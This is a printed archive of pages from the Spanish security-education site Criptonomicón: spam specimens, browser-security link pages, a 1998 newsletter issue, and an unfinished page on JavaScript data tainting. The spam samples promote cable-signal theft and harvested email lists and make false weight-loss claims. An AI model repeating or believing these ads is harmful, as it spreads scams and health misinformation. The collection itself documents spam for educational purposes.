THE MOVIE CHANNEL, Pay per view events, Adult stations,
and any other scrambled signal
NEXT WEEK!
You can EASILY assemble a cable descrambler in less than 30 minutes!
You have probably seen many advertisments for similar plans....
BUT OURS are BETTER!
We have compared it to all the others and have actually
IMPROVED the quality and SIMPLIFIED the design !!!
**

We even include PHOTOS! **

OUR PLANS ARE BETTER!


We have NEW, EASY TO READ,EASY to assemble plans for only $6.99 USD !
We have seen them advertised for as much as $49.00 USD and you have
to wait weeks to receive them!
WHAT THE OTHERS SAY IS TRUE!
Parts are available at any local electronics store !
Call and ask them BEFORE you order!
DOES INDEED WORK!
You will need part#'s 270-235
271-1325
278-212
RG59 coaxial cable,
#12 copper wire,
and a variable capacitor.
**

These parts described by name in the instructions.****


They may have to special order the variable capacitor....
But WHY WAIT for a special order?
WE have them!
**

We Have them!

We Have them!

WE have secured a supply of the capacitors directly from


the manufacturer, and We WILL include one with your plans
for an ADDITIONAL$10.00 USD only!

It is LEGAL, providing of course you use these plans for educational


purposes only.
IT'S FUN!
We're sure you'll enjoy this!

Our FAMILIES sure do!

* you need one descrambler for each TV.


NO MORE MONTHLY BILLS!
$ 6.99 USD

for plans only

$10.00 USD

for variable capacitor only

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (13 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
$16.99 USD
$

for The easy to assemble plans and


one variable capacitor!

1.50 USD for shipping and handling INTERNATINAL ORDERS!

Pay by check or money order payable to:


The Hobby Pros
336 Bon Air Center #254
Greenbrae, Ca.
94904
USA
Please provide a self addressed envelope for priority delivery!
WE pay the postage!
We will RUSH your order to you!

************************************************************************************************
DONT MISS OUT! New Email Addresses 6-5-98
You Can Reach 50,000 People for only $29.00
I learned the hard way by purchasing from those
companies that advertising millions of addresses
for little money...
I can only
to extract
them for a
source for

tell you that they are a rip off. I started


new addresses each week myselfand sell
Fair price. The internet needed a Quality
Email Addresses....

They Do work Great! Once i started compiling lists


of these Fresh email addresses, my sales took off!
ADVERTISE YOUR PRODUCT OR WEBSITE
These Fresh Email Addresses have only been
used a few times to reach you with this Offer!
50,000 Compiled Today

(6-5-98)

THESE ARE QUALITY ADDRESSES!


(Dont trust the millions for just cheap prices
they try to sell you) Please pay close
attention to this letter!!
Dont make the
same mistakes i made...
Again, Dont Hesitate!
You want to use these NEW email addresses
to advertise your product or website as soon
as possible...
ORDER NOW!
(Include your postal address)
Send $29.00 Cash, Check or Money Order to:
ISA
2526 Lemay Ferry Rd.
Dept. 344
St. Louis, Mo 63125
Thank You For your Order! Your Disk will be sent
to you immediately.. (sorry, not available in cd yet)
DO YOU ALSO NEED A PROGRAM TO DELIVER
YOUR EMAILS? EMAIL US TODAY WITH ANY
QUESTIONS!

IF YOU WOULD LIKE YOUR NAME REMOVED


FROM ANY MAILINGS IN THE FUTURE SIMPLY

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (14 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
CLICK REPLY AND TYPE REMOVE IN THE
BODY...

************************************************************************************************
Lose up to 48lbs in just 6 Weeks.
FREE one week supply available!
Send $1 Plus self addressed, stamped
envelope :
Ultramax, Dept50644
Jenny Ladek
9213 Pavia
St. Louis, MO 63123
THRILLING ULTRATRIM SUPER PILL
GUARANTEES RAPID WEIGHT-LOSS!
Laguna Beach, CA - There now exists, an all natural
bio-active weight-loss compound so powerful, so
effective, so relentless in its awesome attack on bulging
fatty deposits that it has virtually eliminated the need to
diet. News of this super pill from Asia is sweeping the
country. The product is called UltraTrim 2000 and it's
dynamite! In fact, thousands of people are now trying
UltraTrim and losing weight faster than ever before!
Some people reported as much as 3 Pounds the first
24 Hours!
FLUSHES CALORIES RIGHT OUT OF YOUR BODY!
UltraTrim ingredients were developed in Asia by
medical researchers. The product contains no drugs
whatsoever. It's ingredients are derived from plants
that grow primarily in Southern Asia. The technical name
is HCA.
EAT ALL YOU WANT AND STILL LOSE WEIGHT
(PILL DOES ALL THE WORK)
Why HCA? For years it was a widely held belief
that the HCA plant extracts had magical properties. When
a person ate a small amount of this delicious plant extract
he would miraculously lose weight! The researchers
investigated this phenomenon and discovered, through
sophisticated testing, that the plant extract did indeed
cause rapid weight-loss.
COMPANY OFFERS EXTRAORDINARY GUARANTEE
By Now it should be obvious the UltraTrim is no
ordinary diet pill. Unlike other diet programs, once you've
taken Ultratrim there is really nothing else to do. You'll
marvel at the way UltraTrim literally reverses years of
over eating. You need only follow the simple instructions.
Thats It! You can continue to enjoy those foods you love
to eat. UltraTrim simpy does not allow your body to absorb
excess calories. Period!
Ultramax is the only company in the United States
authorized to sell UltraTrim. They have tested the product
thoroughly and are convinced that with UltraTrim you can
achieve the body of your dreams. They dont care if you've
tried to lose weight before and failed. They have
documented the results of skeptical people who now
swear by UltraTrim. Ultramax means it when they say you
can lose a maximum amount of fat in record time.
WE ARE SUPPORTERS OF RESPONSIBLE EMAIL MARKETING.
IF YOU DONT WANT TO RECEIVE ANY COMMERCIAL EMAILS.
PLEASE CLICK REPLY AND TYPE REMOVE.

file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt (15 of 15) [25/10/2000 02:33:07 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/anuncio.txt

LET US DO YOUR BULK MAILINGS!!!


..$350 PER MILLION ADDRESSES SENT
..$250 PER 1/2 MILLION ADDRESSES SENT
THE WAY OF THE FUTURE FOR SUCCESS IN YOUR BUSINESS!
Our company will do bulk emailing for your product/service.
Addresses are extracted daily by six of our computers,
which run 24 hours a day 7 days a week, scanning the net
for new addresses. Estimated 60-80,000 addresses extracted
daily. They are fresh! Over 40 million addresses on file.
No more than 2 pages (50 lines), no porn and no foul
language. $50 per page/25 lines per page beyond 2 pages.
We do not do targeted mailings at this price.
Targeted mailings:
$150 per 50,000 addresses extracted or
We can extract by country, occupation,
associations, product, etc. If we can
search and extract what you need, then

less.
organizations,
not
nobody can.

There are no lower prices on the net. Your mailing


can be done in a matter of hours. We have 6 computers
extracting addresses 24/7.
For the fastest service, cheapest prices and cleanest
mailings call our processing and new accounts office
at 904-282-0945, Monday - Friday 9 - 5 EST. If the line is
busy, please keep trying, as bulk mailing is growing fast.
We do want to work with you to advertise your product.
To have your name removed, call our processing office.
Any negative responses will be dealt with accordingly.

***********************************************
***********************************************
Aqu tenis otro anuncio de lo mismo
***********************************************
***********************************************
57 MILLION EMAIL ADDRESSES FOR ONLY $99
You want to make some money?
I can put you in touch with over 50 million people at virtually no cost.
Can you make one cent from each of theses names?
If you can you have a profit of over $500,000.00
That's right, I have 57 Million Fresh email
addresses that I will sell for only $99. These are all
fresh addresses that include almost every person
on the Internet today, with no duplications. They are
all sorted and ready to be mailed. That is the best
deal anywhere today ! Imagine selling a product for

file:///C|/TEMP/criptonomicon/criptonomicon/spam/anuncio.txt (1 of 4) [25/10/2000 02:33:08 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/anuncio.txt

only $5 and getting only a 1/10% response. That's


$2,850,000 in your pocket !!!
Don't believe it? People are making that kind of
money right now by doing the same thing, that is
why you get so much email from people selling you
their product....it works ! I will even tell you how to
mail them with easy to follow step-by-step
instructions I include with every order. These 57
Million email addresses are yours to keep, so you
can use them over and over and they come on 1 CD.
This offer is not for everyone.
If you can not see the just how excellent the
risk / reward ratio in this offer is then there is
nothing I can do for you.
To make money you must stop dreaming
and TAKE ACTION.
****************************************
THE BRONZE MARKETING SETUP
57,000,000 email addresses on CD
These name are all in text files
ready to mail!!!
$99.00
****************************************
THE SILVER MARKETING SETUP
57,000,000 email addresses on CD
These name are all in text files
ready to mail!!! AND
8 Different Bulk email programs
and tools to help with your mailings
and list management.
$ 139.00
****************************************
THE GOLD MARKETING SETUP
VIRTUALLY EVERYTHING!!
57,000,000 email addresses on CD
These name are all in text files
ready to mail!!! AND
8 Different Bulk email programs
and tools to help with your mailings
and list management.
AND
Over 500 different Business Reports
now being sold on the Internet for up to

file:///C|/TEMP/criptonomicon/criptonomicon/spam/anuncio.txt (2 of 4) [25/10/2000 02:33:08 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/anuncio.txt

$100 each. You get full rights to resell these reports.


With this package you get the email addresses,
the software to mail them AND ready to sell
information products.
AND ......
.. a collection of the 100 best money making
adds currently floating around on the Internet.
$ 189
****************************************
THE PLATINUM MARKETING SETUP
FOR THOSE READY TO "OWN THE NET"
57,000,000 email addresses on CD
These name are all in text files
ready to mail!!! AND
8 Different Bulk email programs
and tools to help with your mailings
and list management.
AND
Over 500 different Business Reports
now being sold on the Internet for up to
$100 each. You get full rights to resell these reports.
With this package you get the email addresses,
the software to mail them AND ready to sell
information products.
AND ......
.. a collection of the 100 best money making
adds currently floating around on the Internet.
AND ......
FLOODGATE & GOLDRUSH FULLY REGISTERED SOFTWARE!!
This is the Number 1 most powerful mass mailing software in the world today.
There is nothing that can compare for speed, reliability, performance, and the
ability to use "stealth" functions.
This is the package that will allow you to use the net as your own personal
"money tree" at will!!!
$ 379
****************************************
SEVERAL WAYS TO ORDER !!!
IF YOU ORDER BY PHONE WE WILL SHIP YOUR CD CONTAINING THE 57 MILLION + NAMES
WITHIN 12 HOURS OF YOUR ORDER!!!
1) WE ACCEPT: AMERICAN EXPRESS OR

file:///C|/TEMP/criptonomicon/criptonomicon/spam/anuncio.txt (3 of 4) [25/10/2000 02:33:08 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/spam/anuncio.txt

VISA <> MASTERCARD


TYPE OF CARD AMX / VISA / MC??_______________
EXPIRATION DATE ___________________________
NAME ON CREDIT CARD________________________
CREDIT CARD #________________________________
BILLING ADDRESS ____________________________
CITY_________________________________________
STATE________________ZIP_____________________
PHONE INCLUDE AREA CODE___________________
EMAIL ADDRESS______________________________
WE WILL BILL selected amount to your account plus the following
shipping costs
SHIPPING COST OF 3.85 FIRST CLASS MAIL
SHIPPING COST OF 15.00 24 HOUR EXPRESS MAIL / FEDERAL EXPRESS
SALES TAX added to AR residents
>>> Send correct amount in cash, check or money
order to:
>>> FIRE POWER!!
>>> 1320 N. "B" St., Suite 112-24
>>> Fort Smith, AR 72901

2) Send the same above requested credit card


information to above address.
3) Call phone # 530-876-4293. This is a 24 hour phone
number to place a CREDIT CARD order.
FIRE POWER! is a private company and is not affiliated with, or endorsed by,
AOL, MSN, or any other Internet Service Provider.
Copyright 1998
All rights reserved

file:///C|/TEMP/criptonomicon/criptonomicon/spam/anuncio.txt (4 of 4) [25/10/2000 02:33:08 p.m.]

Agujeros de seguridad del Explorer

Agujeros de seguridad del Explorer


Suscripcin gratis

Todos los agujeros descubiertos por


Cuartango

Intimidad?

Agujero de Ciucci

Artculos

Los agujeros de Guninsky

Seguridad

Cmo extraer tu password en NT

Linux

Pgina de Microsoft

Navegacin segura

Microsoft's Internet Explorer Security FAQ

Control de acceso

Scott Schnoll's Unofficial Microsoft Internet


Explorer Security FAQ

CGI

Java

JavaScript

Cookies

Crashes

IE/Powerpoint Bug
MSBC Top Story; The MsIE Bug Secret
Welcome to the Microsoft Security Advisor
WinFiles.com Security Bugs and Fixes
Versiones locales de algunos de estos agujeros

Agujeros

Quiero ver lo chungo que tambin lo tiene Netscape


Spam

Remailers
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Anonimato

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/msie.html (1 of 2) [25/10/2000 02:33:19 p.m.]

Agujeros de seguridad del Explorer


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/msie.html (2 of 2) [25/10/2000 02:33:19 p.m.]

Agujeros de seguridad del Netscape

Agujeros de seguridad del Netscape


Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Cache compartido
Los agujeros de Guninsky
Tu-cow: navegacin al descubierto
DigiCrime
Netscape (in)Security (problems)
Netscape Security Solutions
Crash Warning -- Your browser will crash crash
crash crash crash crash crash crash crash crash
crash crash crash

Java

Versiones locales de algunos de estos agujeros


JavaScript

Quiero ver lo chungo que tambin lo tiene el Explorer

Cookies

Crashes

Agujeros

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/netscape.html (1 of 2) [25/10/2000 02:33:20 p.m.]

Agujeros de seguridad del Netscape


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/netscape.html (2 of 2) [25/10/2000 02:33:20 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt

Boletn del Criptonomicn


Ao I, n 25
28 de octubre de 1998
******************************************
Susurros desde la Cripta
1. Editorial
Las noticias de la semana:
2. Parche para las zonas seguras
3. Bug en Netscape Navigator
4. Alarma de BackOriffice
Candados, cortafros y otras herramientas
5. Correos certificados
Parada y fonda
6. Vulnerabilidades
Consejos y trucos
7. Cmo escribir annimamente en las news
Cursos en el Criptonomicn
8. Diferencias entre GET y POST
Hablan los expertos
9. El Comercio Electrnico
Formacin
10. Curso de Seguridad en el CSIC
Comentarios de los lectores
11. El agujero ms grande en Internet
Sobre el boletn del Criptonomicn
12. Informacin sobre suscripcin y cmo borrarse
13. Nmeros atrasados
******************************************
Susurros desde la cripta
******************************************
1. Editorial
El comercio electrnico siempre est en el candelero. Nuevos acuerdos entre
bancos y organismos de pago, nuevas polticas de certificacin, pero an
queda en el aire la cuestin de la seguridad y, cmo no, la lentitud de la
conexin. El comercio en Internet lleva aos en el limbo, que si despega
definitivamente, que si todava no es el momento, que si no hay confianza
suficiente Llegar a ser una realidad? Esta semana contamos con una
ilustre firma en la seccin de Hablan los expertos que responder a
algunos de las cuestiones tcnicas sobre lo que es y las soluciones que
ofrece el comercio electrnico.
******************************************
Las noticias de la semana
******************************************
2. Parche para las zonas seguras
Microsoft acaba de lanzar un parche que soluciona una vulnerabilidad en la

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt (1 of 7) [25/10/2000 02:33:20 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt

forma en que Internet Explorer 4 determina a qu zona de seguridad pertenece


un servidor determinado, como ya inform la Brjula la semana pasada.
Gracias a esta vulnerabilidad, un hacker podra manipular la direccin (el
URL) de su sitio Web, de manera que su sitio fuera tratado por el navegador
como localizado en la intranet dentro del esquema de Zonas de Seguridad de
Internet Explorer, por lo tanto con mayores permisos de ejecucin y mayor
libertad dentro de nuestro ordenador.
Microsoft recomienda encarecidamente que los usuarios a los que afecte este
agujero descarguen e instalen el correspondiente parche tan pronto como les
sea posible.
El parche est disponible en:
http://www.microsoft.com/ie/security/dotless.htm
Alternativamente, los usuarios de Windows 98 pueden obtener el parche
utilizando la Actualizacin de Windows: lanzando la actualizacin desde el
men de Inicio de Windows y pulsando Actualizacin de Productos. Cuando se
requiera, seleccionar S para permitir que se determine qu parches hacen
falta. Si este parche resulta necesario, aparecer listado en la seccin
Actualizaciones Crticas.
******************************************
3. Bug en Netscape Navigator
Ayer Netscape admiti la existencia de un nuevo agujero de seguridad, en
esta ocasin en la versin 4.5 de su navegador, descubierto por Peter Snow
de la Universidad de Yale. Este fallo afecta especialmente a los usuarios
que comparten sus ordenadores, como en grandes compaas o entornos
universitarios y est relacionado con la manera como se tratan unas
determinadas meta-etiquetas en las pginas HTML, en concreto, las que tienen
que ver con el almacenamiento en el cache de los contenidos de un
formulario, de manera que si pulsamos el botn de Atrs, los datos
previamente introducidos continen ah al volver atrs, ahorrndonos el
tener que teclearlos todos en el caso de que queramos modificar slo alguno.
En este agujero, el navegador interpreta la etiqueta que le dice que no
cachee la pgina (que no la almacene temporalmente con el fin de no tener
que pedirla en el futuro a travs de la Red, sino para recuperarla
localmente, con la consiguiente reduccin en el tiempo de carga) no
almacenndola en disco aunque s en memoria, de manera que en entornos
multiusuario sera posible pulsar el botn de atrs y encontrarnos con los
datos que ha rellenado otro de los usuarios del sistema, como por ejemplo
sus datos personales, entre ellos tal vez su nmero de tarjeta de crdito si
se le solicitaba en el formulario que complet.
Irnicamente, este problema slo se presenta cuando se utilizan conexiones
seguras a travs de SSL (ms informacin sobre SSL en
www.iec.csic.es/criptonomicon/ssl.html).
Hasta que Netscape prepare un parche, la solucin pasa por:
a) reinicializar el navegador despus de cada sesin en ordenadores
compartidos
b) borrar el cache de memoria y configurarlo a cero, en el men de
Edicin>Preferencias>Avanzadas>Cach
Ms informacin en:

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt (2 of 7) [25/10/2000 02:33:20 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt

http://www.news.com/News/Item/0,4,28010,00.html
******************************************
4. Alarma de BackOriffice
BackOriffice est de actualidad. Pero qu es? En qu consiste? Qu
amenazas representa?
Encontraris respuesta a estos interrogantes en las siguientes pginas de La
Brjula:
http://labrujula.net/ventana_inf/esp-bo.htm
******************************************
Candados, cortafros y otras herramientas
******************************************
5. Correos certificados
Certifiedemail.com es una aplicacin para correo electrnico que ofrece la
seguridad de que los mensajes son enviados, ya que el emisor recibe una
notificacin tan pronto como el destinatario lo recibe. Adems cuenta con la
capacidad de comunicarse en un entorno seguro, ya que se enva y recibe el
correo cifrado.
Sirve tambin como cierta garanta contra los virus, en la medida en que los
mensajes son escaneados antes de ser almacenados en el sistema.
Lo encontraris en:
http://www.certifiedemail.com/
******************************************
Parada y fonda
******************************************
6. Vulnerabilidades
La mayor recopilacin de vulnerabilidades y exploits (maneras de explotar
tales vulnerabilidades) en Internet, la encontraris en:
http://www.rootshell.com/
******************************************
Consejos y trucos
******************************************
7. Cmo escribir annimamente en las news
Ms de uno me habis preguntado cmo se puede hacer para enviar noticias
annimamente. Bien, como ya anunci en el boletn nmero 2, DejaNews ha
lanzado un servicio de participacin annima en las news, que tras
registrarnos, nos permitir enviar de manera completamente annima noticias
en cualquiera de los innumerables grupos de noticias.
Las instrucciones paso a paso para registrarse y enviar noticias
annimamente los podis encontrar en la pginas de DejaNews en:
http://www.dejanews.com/post.xp
******************************************
Cursos en el Criptonomicn

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt (3 of 7) [25/10/2000 02:33:20 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt

******************************************
8. Diferencias entre GET y POST
GET o POST? He ah la cuestin. Si alguna vez habis trabajado con
formularios, os habris hecho esa pregunta. Qu mtodo de envo utilizo?
Cul es mejor, ms seguro, ms rpido?
La respuesta en esta nueva adicin al curso sobre seguridad en CGI, en:
http://www.iec.csic.es/criptonomicon/cgi/datos.html
******************************************
Hablan los expertos
******************************************
9. El Comercio Electrnico
Esta semana contamos con la colaboracin de Miguel ngel Sarasa Lpez
(msarasa@posta.unizar.es), criptlogo de la Universidad de Zaragoza,
co-autor del libro "Criptografa Digital, Fundamentos y Aplicaciones",
editado por Prensas Universitarias de Zaragoza este ao. Ha escrito en
exclusiva para el Criptonomicn un artculo sobre la realidad actual del
comercio electrnico, los retos a los que se enfrenta y las soluciones que
se estn adoptando.
El Comercio Electrnico
Hasta no hace demasiado tiempo la interaccin social a nivel comercial se
efectuaba cara a cara, por telfono o bien por correo postal. Sin embargo,
gracias a las innovaciones tcnicas acontecidas en los ltimos aos, se ha
producido el nacimiento de un nuevo tipo de comercio, el denominado comercio
electrnico.
El comercio electrnico es un servicio de la tecnologa que permite la
realizacin de operaciones de negocios y la compraventa de bienes y
servicios mediante la utilizacin de sistemas electrnicos, como por ejemplo
los ordenadores personales, hoy ya tan habituales en muchos hogares. En
definitiva, este nuevo mercado electrnico nos permite tener en nuestro
domicilio una gran galera comercial por la que podemos pasear de forma
fcil y rpida con el ratn de nuestro ordenador, y todo ello sin movernos
de casa.
El comercio electrnico no es algo totalmente nuevo, si se tiene en cuenta
que desde hace ya ms de una dcada existe un protocolo denominado EDI
(Electronic Data Interchange) para el intercambio electrnico de documentos.
Existen muchas otras variantes de comercio electrnico, como por ejemplo el
denominado home-banking, que permite al usuario realizar operaciones en sus
cuentas bancarias igualmente desde su ordenador personal.
Todo lo anterior se hace posible gracias a la existencia de grandes redes
digitales de comunicacin a nivel mundial, que facilitan las transacciones
entre las partes implicadas. Entre ellas merece especial mencin la red
Internet, la cual da cobertura a millones de usuarios: personas, negocios,
empresas, revistas y todo tipo de sociedades.
Las ventajas del comercio electrnico son evidentes. El comprador puede ver
de manera rpida todo el escaparate electrnico y no tiene que ir tienda por
tienda en busca del producto deseado. Se optimiza tambin el tiempo de
atencin al cliente, que no tiene que esperar largas colas para ser
atendido. Por su parte, el vendedor tambin se beneficia, puesto que puede

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt (4 of 7) [25/10/2000 02:33:20 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt

ofertar sus productos sin necesidad de mostrarlos fsicamente al comprador.


Otras ventajas del comercio electrnico son las siguientes:
1) Reduce los retrasos gracias a la velocidad de transmisin
2) Disminuye el ciclo de produccin, creando mercados ms competitivos
3) Hace posible la igualdad de trato a los clientes independientemente de
sus caractersticas individuales: nacionalidad, lugar de residencia, etc.
4) Ampla de forma considerable el mercado potencial de las empresas
5) Faculta a las pequeas y medianas empresas el acceso a mercados que de
otra manera tendran vetados por su elevado coste
Pese a todo, tambin es cierto que este tipo de comercio presenta sus
inconvenientes, algunos de ellos potencialmente peligrosos y todava por
solucionar. Entre ellos, el ms importante es la falta de seguridad en los
procesos de compraventa. En el caso del comercio tradicional, como se ha
indicado anteriormente, las mayora de transacciones se efectan cara a
cara, por telfono o por correo. Todas estas actividades pueden considerarse
intrnsecamente seguras. Sin embargo, en el caso del comercio electrnico,
la interaccin entre comprador y vendedor se realiza a travs de una red
abierta (Internet), que no puede considerarse un canal de comunicacin
seguro a menos que se adopten ciertas medidas de proteccin.
El estudio y desarrollo de estas medidas de proteccin es precisamente uno
de los objetivos fundamentales de la criptografa. sta proporciona al
comercio electrnico las herramientas necesarias para garantizar, dado el
caso, el carcter secreto de la informacin intercambiada
(confidencialidad), as como la no manipulacin de la misma entre el origen
y el destino (integridad).
Sin embargo, el problema de la identificacin de las partes (autenticacin)
todava no est del todo resuelto. A este respecto, conviene sealar que una
de las situaciones ms preocupantes actualmente es la publicacin de los
datos personales y confidenciales del comprador (como por ejemplo el nmero
de su tarjeta de crdito) en un medio totalmente abierto como es Internet.
Otro tema pendiente de resolver es el de cmo obtener los resguardos que
permitan realizar posteriores reclamaciones tanto al comprador como al
vendedor en el caso de que alguno de ellos se sienta perjudicado por el otro
una vez concluida la transaccin.
Hoy da existen diferentes protocolos como el SET (Secure Electronic
Transaction) o el SSL (Secure Sockets Layer) que se ocupan de que este tipo
de transacciones a travs de redes informticas sean lo ms seguras
posibles. Sin embargo, ninguno de ellos ofrece todava una seguridad
completa, ya que nicamente son capaces de solucionar de forma parcial los
problemas antes apuntados, con lo que tanto el comprador como el vendedor
pueden todava engaar. As, por ejemplo, puede darse la situacin de que el
comprador pague un producto y posteriormente no lo reciba, o bien que el
vendedor entregue un producto y posteriormente no pueda cobrarlo. Adems, lo
que es ms peligroso, sin que ninguno pueda demostrar que ha sido engaado
por el otro.
Despus de todo lo dicho, es indudable que uno de los factores que ha
contribuido en mayor medida al xito y desarrollo del mundo empresarial en
los ltimos aos ha sido la implantacin del comercio electrnico. Esto hace
pensar que su protagonismo en el futuro ser incluso mayor que el que tiene
hoy en da. Es igualmente cierto que la evolucin futura de este tipo de
comercio depender de forma directa de la capacidad de garantizar su

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt (5 of 7) [25/10/2000 02:33:20 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt

seguridad mediante la criptografa, pero tampoco es conveniente que la


psicosis de inseguridad electrnica nos lleve a frenar el despegue de este
comercio en Internet. En definitiva, sera conveniente que empezsemos a
considerar el problema del comercio electrnico no tanto como un problema de
inseguridad sino ms bien de confianza.
******************************************
Formacin
******************************************
10. Curso de Seguridad en Internet e Intranet
El Departamento de Tratamiento de la Informacin y Codificacin del
Instituto de Fsica Aplicada del CSIC anuncia que impartir un curso abierto
al pblico sobre Seguridad en Internet e Intranet durante los prximos das
13 a 15 de enero de 1999.
Todos aquellos interesados en asistir fsicamente al mismo (no es un curso a
travs de Internet ni por vdeo conferencia ni ningn otro medio remoto y
tampoco estar disponible en Internet ni por correo electrnico), pueden
consultar la informacin ms detallada sobre el programa, lugar y precio de
la matrcula en la pgina:
http://www.iec.csic.es/curso/curso.html
No se conceden becas para el mismo, aunque se contemplan cursos especiales
para empresas y grupos con intereses especficos.
Para informarse sobre condiciones de pago y fechas de matriculacin, no
olviden pasarse por la pgina:
http://www.iec.csic.es/curso/inscrip.html
******************************************
Comentarios de los lectores
******************************************
11. El agujero ms grande en Internet
Esta semana contamos en este espacio abierto a la participacin de todos los
lectores, con las impresiones de Diego Marcos Camarasa de I+D Dev., Nuevas
Tcnicas de Comunicacin S.R.L. Si queris participar en este espacio,
podis enviarme vuestros comentarios en cualquier momento.
=====================================================
No, no voy a hablar sobre un nuevo bug encontrado en Internet Explorer o
Netscape; quisiera compartir mi opinin sobre el agujero ms grande que
existe en Internet: las empresas sin control.
Internet, siempre se le ha denominado la red de redes, centro de
informacin a nivel mundial y la mayor base de datos que existe; pero
que hay de la privacidad para los usuarios?
En Internet hay millones de usuarios y por lo tanto, con distintas
finalidades en la red. Unos buscan informacin para terminar su carrera,
otros para pedir informacin, otros para ver imgenes porno, otros por
el mero hecho de dar una vuelta. Entonces, si este es el planteamiento
de Internet; por que hay empresas que insisten en hacer llegar sus
productos a usuarios que no lo desean? Cuando una persona enciende su
televisor, los anuncios no se cuelan dentro de su nevera (si son
alimenticios), ni te meten el cartel de "se vende un Nissan" en el

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt (6 of 7) [25/10/2000 02:33:20 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt

garaje. Por qu, entonces, atacan a la privacidad de los usuarios?


No estoy en contra de la publicidad en Internet, pero en una medida no
excesiva y sin atacar a la privacidad.
******************************************
Sobre el boletn del Criptonomicn
******************************************
12. Informacin sobre suscripcin y cmo borrarse
Para borrarse de este servicio basta con enviar un correo a la direccin
cripto-request@iec.csic.es con el siguiente mensaje (sin asunto o
"subject"):
leave
desde la misma cuenta de correo en la que recibs el boletn.
Tenis ms informacin y nmeros atrasados en la pgina
http://www.iec.csic.es/criptonomicon/suscripcion.html
******************************************
13. Nmeros atrasados
Podis encontrar los nmeros atrasados del boletn en:
http://www.iec.csic.es/criptonomicon/suscripcion.html
Se pueden recuperar todos en formato ZIP o de uno en uno.
******************************************
(C) Copyright 1998 Criptonomicn
http://www.iec.csic.es/criptonomicon
Un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del
CSIC por Gonzalo lvarez Maran
email: gonzalo@iec.csic.es

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt (7 of 7) [25/10/2000 02:33:20 p.m.]

Marcado de Datos (Data Tainting)

Marcado de Datos
Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Las primeras versiones de JavaScript posean un agujero de seguridad consistente en


que las propiedades de un documento estaban siempre a disposicin del cdigo
JavaScript de otros documentos.
Qu riesgos representaba este agujero para la seguridad y la intimidad? Imagina que
t cargas una pgina en un frame y que en otro frame escondido (de dimensin tan
pequea que no aprecias su presencia) existe un programa en JavaScript que va
accediendo a las propiedades de tu pgina como LINKS, ANCHORS y elementos de
los FORM, y los va transmitiendo a un sitio Web donde son almacenados y
procesados.
Puedes pensar que el riesgo no es para tanto. Est bien, imagina los siguientes
escenarios:
Un documento podra abrir sin t advertirlo un fichero URL, como por
ejemplo file://c:\windows\, en un frame oculto, que listara los
contenidos de ese directorio en el frame. Un programa en JavaScript en otro
frame podra entonces leer los contenidos (disponibles en el array links) y
enviarlos al servidor.
Una pgina Web podra abrir un frame invisible mediante un programa en
JavaScript, que se quedase en ejecucin mientras navegas por otros sitios.
Cada cierto tiempo, el programa podra enviar al servidor una lista con los
sitios por los que has ido navegando.
Con el fin de evitar estas pequeas amenazas a la intimidad y la seguridad, Netscape
cre una solucin en la que se tapaban estos agujeros: evitar que un documento
pueda acceder a las propiedades de otro documento, a no ser que provenga del
mismo servidor. Aunque as se solucionaba el problema, tambin se impedan otras
aplicaciones benvolas en las que se haca necesario poder leer las propiedades de
otras pginas, por lo que se lleg a una solucin de compromiso, llamada Marcado de
Datos (Data Tainting), que permite acceder a las propiedades de otro documento,
pero dejando evidencia de ello.
Cuando el marcado de datos est habilitado, el cdigo JavaScript en una
ventana puede acceder sin restricciones a las propiedades de otra ventana, sin
importar el servidor desde el que fue cargado el documento de la otra ventana.
Sin embargo, el autor de la otra ventana marca (taints) los valores de las
propiedades u otros datos que deberan ser seguros o privados, y JavaScript no
